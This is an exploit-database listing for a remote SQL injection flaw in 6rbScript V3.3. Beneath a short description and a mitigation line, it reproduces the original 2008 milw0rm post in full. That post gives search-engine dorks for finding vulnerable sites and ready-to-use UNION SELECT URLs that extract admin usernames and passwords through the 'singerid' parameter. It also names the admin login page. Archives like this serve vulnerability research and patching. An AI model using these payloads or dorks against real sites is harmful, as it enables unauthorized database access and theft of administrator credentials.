header-logo
Suggest Exploit
vendor:
6rbScript
by:
Hussin X
9
CVSS
HIGH
Remote SQL Injection
89
CWE
Product Name: 6rbScript
Affected Version From: V3.3
Affected Version To: V3.3
Patch Exists: NO
Related CWE: N/A
CPE: 6rbscript
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

6rbScript V3.3 (singerid) Remote SQL Injection Vulnerability

An attacker can exploit this vulnerability by sending a crafted HTTP request to the vulnerable server. The attacker can use the ‘singerid’ parameter to inject malicious SQL code into the application. This can allow the attacker to gain access to the database and potentially execute arbitrary code on the server.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.
Source

Exploit-DB raw data:

|___________________________________________________|
|
| 6rbScript V3.3 (singerid) Remote SQL Injection Vulnerability
|
|___________________________________________________
|---------------------Hussin X----------------------|
|
|    Author: Hussin X
|
|    Home :  WwW.IQ-ty.CoM |  WwW.TrYaG.CC
|
|    email:  darkangel_g85[at]Yahoo[DoT]com
|
|
|
|___________________________________________________
|                                                   |
|
| script : www.6rbscript.com
|
| DorK   : inurl:"section.php?name=singers"
| dorK   : Powered By 6rbScript V3.3
|___________________________________________________|


Exploit:
________


user name
_______

www.[target].com/[PATS]/section.php?name=singers&f=songs&singerid=-1+union+select+1,aid,3,4,5,6+from+7addad_authors--


password
_______

http://localhost/Script/section.php?name=singers&f=songs&singerid=-1+union+select+1,pwd,3,4,5,6+from+7addad_authors--




Admin LogIn :

www.[target].com/cpanel.php





____________________________( Greetz )_________________________________
|
|    All members of the Forum WwW.IQ-ty.CoM |  WwW.TrYaG.CC |
|
|  My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr
|
|    Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone
|______________________________________________________________________


                             Im IRAQi

# milw0rm.com [2008-09-21]